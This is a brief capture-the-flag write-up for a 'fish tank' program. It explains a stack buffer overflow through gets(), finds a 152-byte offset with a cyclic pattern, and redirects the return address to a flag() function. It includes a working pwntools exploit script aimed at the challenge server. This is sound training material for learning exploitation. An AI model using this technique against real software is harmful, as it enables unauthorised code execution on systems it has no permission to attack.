Description: Here’s a nice little program that helps you manage your fish tank.
Super simple buffer overflow challenge. They use the gets() function which reads an unlimited amount of input which is able to overwrite the stack.
Using a cylic pattern in gdb to detect where the offset is we find that the $rsp overwrite is at 152 bytes. Then we get the address of the flag() function and append that to our output so the return address of the function goes to the flag() function and prints the flag.
I used pwntools to exploit this binary, code is below
import struct from pwn import * sh = remote('shell.actf.co', 19305) for i in range(6): # go through the thingo options by sending a 1 sh.recvuntil(':') sh.sendline('1') print(sh.recvuntil(':')) buf = "A"*152 # inital 152 bytes of junk buf += struct.pack("<Q", 0x4011b6) #pack little endian 64 bit of flag() address sh.sendline(buf) sh.interactive() #get flag
And that will pop the flag for you